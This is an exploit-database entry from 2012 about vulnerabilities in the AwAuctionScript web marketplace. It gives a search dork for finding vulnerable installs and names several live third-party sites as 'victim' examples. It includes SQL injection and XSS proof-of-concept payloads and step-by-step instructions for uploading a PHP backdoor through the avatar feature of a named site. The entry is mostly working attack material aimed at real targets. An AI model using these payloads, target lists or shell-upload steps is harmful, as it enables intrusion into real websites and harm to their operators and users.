AwAuctionScript Multiple Vulnerabilities

2012-11-04T00:00:00
ID 1337DAY-ID-19687
Type zdt
Reporter X-Cisadane
Modified 2012-11-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================================================================== 
AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities 
==========================================================================================
 
:----------------------------------------------------------------------------------------------------------------------------------------: 
: # Exploit Title : AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities 
: # Date : 04 November 2012 
: # Author : X-Cisadane 
: # Download : http://www.awauctionscript.com OR Googling it with this Keyword : AwAuctionScript - Market Place for WebMasters 
: # Version : ALL 
: # Category : Web Applications 
: # Vulnerability : SQL Injection Vulnerability, Upload Shell/Backdoor Vulnerability, XSS/HTML Injection Vulnerability 
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English) 
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari 
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS 
===== 
inurl:/listing.php?category=Website
 
Proof of Concept 
================ 

SQL Injection : http://victim site/<path>/listing.php?category=Website&PageNo=[-SQL] 
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-12,6' at line 1

Example :
http://www.domaingang.net/listing.php?category=Website&PageNo=-1 
http://www.wmmediacorp.com/sellyoursite/listing.php?category=Website&PageNo=-1
http://buyandsellwebsite.org/listing.php?category=Website&PageNo=-1 
http://www.santinet.net/offers/listing.php?category=Website&PageNo=-1 
http://nomclub.com/listing.php?category=Website&PageNo=-1 
http://websiterama.com/listing.php?category=Website&PageNo=-1 
http://www.flipitmarketplace.com/listing.php?category=Website&PageNo=-1


XSS (Non Persistent)
- On the Admin Login page (Tested on Firefox)
Fill username with : "><script>alert(/xss/)</script> and the password with anything. 

Example : http://buyandsellwebsite.org/admin/
PIC : http://i50.tinypic.com/i20own.png

- On Listing Page (Tested on Firefox) 
http://victim site/<path>/listing.php?category=[Insert HTML/XSS Script]

Example : http://buyandsellwebsite.org/listing.php?category=<script>alert(/x-cisadane/)</script> 
PIC : http://i46.tinypic.com/dwqip0.png

XSS (Persistent)
*Must be logged in
http://victim site/<path>/sell-your-site.php

Example (Victim/Target) : http://www.flipitmarketplace.com/sell-your-site.php
- Go to http://www.flipitmarketplace.com/sell-your-site.php
- On the Site Name, fill it with this script : <script>alert("Hacked)</script>
- On the Site Description, fill it with this script on from this link http://pastebin.com/5mfg7xv4

PIC : http://i49.tinypic.com/20qz0x1.png

Upload Shell/Backdoor :
Example (Victim/Target) : http://websiterama.com/
- Prepare your .php backdoor, rename it with index.php3 
- Register to victim site, for example : http://websiterama.com/ 
- Activate by E-Mail, after Activated login to http://websiterama.com/login.php
- Go to http://websiterama.com/edit-account.php 
- Upload the avatar, browse your Backdoor/Shell file & upload it!
- Copy the image location/image url of the thumbnail (on the right) 
- Paste in URL. Voilaaaa! http://websiterama.com/avatar/1031115958.php3

#  0day.today [2018-02-16]  #